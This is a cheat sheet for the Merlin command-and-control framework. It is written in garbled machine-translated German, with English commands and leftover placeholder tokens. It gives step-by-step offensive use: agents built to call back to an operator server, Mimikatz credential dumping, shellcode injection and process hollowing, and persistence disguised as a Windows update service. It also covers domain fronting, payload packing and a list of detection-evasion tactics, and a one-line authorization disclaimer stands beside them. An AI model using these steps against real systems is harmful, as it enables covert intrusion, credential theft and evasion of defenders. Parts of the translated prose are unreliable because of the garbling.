Merlin C2 Framework Cheat Sheet

📋 Kopie Alle Befehle 📄 Erzeugen von PDF_HTML_TAG_53___

_

Im Überblick

Merlin ist ein plattformübergreifender Post-Exploitation HTTP/2 Command & Control Server und Agent in Golang geschrieben. Es nutzt HTTP/2 für die Kommunikation und bietet moderne Protokoll-Ausweichfunktionen mit integriertem Daten-Jitter und Verschlüsselung.

ZEITSCHRIFTEN Warning: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

• Installation

Pre-compiled Binaries

```bash

Download latest release for Linux

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z

Download latest release for Windows

Download merlinServer-Windows-x64.7z from GitHub releases

Download latest release for macOS

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z 7z x merlinServer-Darwin-x64.7z ```_

Build from Source

```bash

Install Go (version 1.19+)

git clone https://github.com/Ne0nd0g/merlin.git cd merlin make build-server make build-agent ```_

Docker Installation

```bash

Pull official Docker image

docker pull ne0nd0g/merlin

Run Merlin server in Docker

docker run -it -p 443:443 ne0nd0g/merlin ```_

oder Basisnutzung

Starten von Merlin Server

```bash

Start server with default settings

./merlinServer-Linux-x64

Start server with custom interface

./merlinServer-Linux-x64 -i 0.0.0.0

Start server with custom port

./merlinServer-Linux-x64 -p 8443

Start server with custom certificate

./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key ```_

Agent Generation

```bash

Generate Windows agent

make build-agent-windows

Generate Linux agent

make build-agent-linux

Generate macOS agent

make build-agent-darwin ```_

Befehlsnummer

Server Management

Command	Description
INLINE_CODE_31	Display help menu
INLINE_CODE_32	Show version information
INLINE_CODE_33	List active listeners
INLINE_CODE_34	List connected agents
INLINE_CODE_35	Show active sessions
INLINE_CODE_36	Exit Merlin server
_
Hörer Management
Command	Description
---------	-------------
INLINE_CODE_37	List all listeners
INLINE_CODE_38	Select listener type
INLINE_CODE_39	Set listener option
INLINE_CODE_40	Start the listener
INLINE_CODE_41	Stop the listener
INLINE_CODE_42	Show listener information

Agent Interaction_TABLE_62___

In den Warenkorb

HTTP/2 Listener

```bash

Use HTTP/2 listener

use listener http2

Configure listener options

set Interface 0.0.0.0 set Port 443 set Certificate /path/to/cert.crt set Key /path/to/key.key

Start listener

start ```_

HTTP/3 Listener (QUIC)

```bash

Use HTTP/3 listener

use listener http3

Configure QUIC options

set Interface 0.0.0.0 set Port 443 set Certificate /path/to/cert.crt set Key /path/to/key.key

Start listener

start ```_

TCP Listener

```bash

Use TCP listener

use listener tcp

Configure TCP options

set Interface 0.0.0.0 set Port 4444

Start listener

start ```_

SMB Listener

```bash

Use SMB listener (Windows)

use listener smb

Configure SMB options

set Interface 0.0.0.0 set Port 445

Start listener

start ```_

Agent Configuration

HTTP/2 Agent

```bash

Build HTTP/2 agent

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go

Build with custom options

GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go ```_

Agent Optionen

```bash

Set communication URL

-X main.url=https://server.com:443

Set sleep interval

-X main.sleep=30s

Set jitter percentage

-X main.jitter=0.2

Set maximum retries

-X main.maxretry=7

Set user agent

-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Set proxy

-X main.proxy=http://proxy.com:8080 ```_

Post-Exploitation Befehle

System Information

```bash

Get system information

sysinfo

Get current user

whoami

Get environment variables

env

Get network interfaces

ifconfig

Get running processes

ps ```_

Dateioperationen

```bash

List directory contents

ls /path/to/directory

Change directory

cd /path/to/directory

Create directory

mkdir /path/to/new/directory

Remove file

rm /path/to/file

Copy file

cp /source/file /destination/file

Move file

mv /source/file /destination/file ```_

Network Operations

```bash

Network connections

netstat

ARP table

arp

Routing table

route

DNS lookup

nslookup domain.com

Ping host

ping 192.168.1.1 ```_

Process Management

```bash

List processes

ps

Kill process

kill

Start process

execute

Get process information

info ```_

Erweiterte Eigenschaften

Modul System

```bash

List available modules

modules

Use module

use module

Set module options

set

Run module

run

Show module info

info ```_

Eingebaute Module

```bash

Mimikatz module

use module mimikatz set Command sekurlsa::logonpasswords run

PowerShell module

use module powershell set Command Get-Process run

Assembly execution

use module executeassembly set Assembly /path/to/assembly.exe set Arguments "arg1 arg2" run ```_

Shellcode Execution

```bash

Execute shellcode

use module shellcode set Shellcode run

Shellcode injection

use module shinject set PID set Shellcode run ```_

Persistence

```bash

Registry persistence

use module persistence set Method registry set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" set Value "Update" set Data "C:\temp\agent.exe" run

Service persistence

use module service set Name "UpdateService" set DisplayName "Windows Update Service" set BinaryPath "C:\temp\agent.exe" run ```_

Evasion Techniques

Traffic Obfuscation

```bash

Custom User-Agent

-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

Custom headers

-X main.headers="X-Custom-Header:value"

Domain fronting

-X main.url=https://cdn.example.com -X main.host=legitimate-site.com ```_

Payload Obfuscation

```bash

Build with custom build tags

go build -tags="debug" -ldflags "-s -w" -o agent.exe

Use UPX packing

upx --best agent.exe

Custom encryption

-X main.psk=your-pre-shared-key ```_

Anti-Analysis

```bash

VM detection

use module vmdetect run

Sandbox evasion

use module sleep set Duration 60 run

Process hollowing

use module hollow set Target notepad.exe set Payload run ```_

/ Zertifikat Management

Erstellen Sie selbstgesendetes Zertifikat

```bash

Generate certificate and key

openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Generate with SAN

openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -config <( echo '[req]' echo 'distinguished_name = req' echo '[req]' echo 'CN = server.com' echo '[SAN]' echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100' ) ```_

Let's Encrypt Certificate

```bash

Install certbot

sudo apt install certbot

Generate certificate

certbot certonly --standalone -d yourdomain.com

Use certificate with Merlin

./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem ```_

Operationelle Verfahren

Infrastruktur Setup

```bash

Use redirectors

Set up nginx reverse proxy

server \\{ listen 443 ssl http2; server_name legitimate-site.com;

ssl_certificate /path/to/cert.crt;
ssl_certificate_key /path/to/key.key;

location / \\\\{
    proxy_pass https://merlin-server:443;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
\\\\}

\\} ```_

Team Operations

```bash

Multi-operator setup

Use shared database or file system

Implement proper access controls

Use separate operator certificates

```_

Loggen und Monitoring

```bash

Enable detailed logging

./merlinServer-Linux-x64 -debug

Monitor connections

tail -f merlin.log

Network monitoring

tcpdump -i any -w merlin_traffic.pcap port 443 ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check listener status

listeners

Test connectivity

curl -k https://server.com:443

Check certificate

openssl s_client -connect server.com:443 -servername server.com ```_

Agent Issues

```bash

Debug agent connection

Build agent with debug flags

go build -ldflags "-X main.debug=true" -o agent-debug.exe

Check agent logs

Enable verbose output in agent

```_

Performance Issues

```bash

Adjust sleep and jitter

-X main.sleep=10s -X main.jitter=0.1

Optimize HTTP/2 settings

Increase connection limits

Use connection pooling

```_

Zertifikat Probleme

```bash

Verify certificate

openssl x509 -in server.crt -text -noout

Check certificate chain

openssl verify -CAfile ca.crt server.crt

Test SSL configuration

sslscan server.com:443 ```_

Detection Evasion

Network Level

• Verwenden Sie legitime Zertifikate und Domains
• Implementierung der richtigen HTTP/2 Konfiguration
• Vary-Kommunikationsmuster und -zeit
• Verwendung von Domain-Fronttechniken
• Implementierung einer korrekten Fehlerbehandlung

Host Level

• Verwenden Sie legitime Prozessnamen und -pfade
• Implementierung von Anti-VM und Sandkasten-Erkennung
• Prozesshohlung und Injektion verwenden
• Verschlüsseln von Nutzlasten und Kommunikation
• Saubere Artefakte und Protokolle

Behavioral

• Ressourcennutzung und Netzwerkaktivität begrenzen
• Verwenden Sie legitime Benutzervertreter und Header
• Implementieren Sie den richtigen Schlaf und Jitter
• Verdächtige API-Anrufe vermeiden
• Verwenden Sie lebende Techniken

Ressourcen

• (Merlin GitHub Repository)(https://github.com/Ne0nd0g/merlin)
• Merlin Dokumentation
• Ne0nd0g Blog
• [HTTP/2 C2 Kommunikation](URL_58__

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Merlin C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *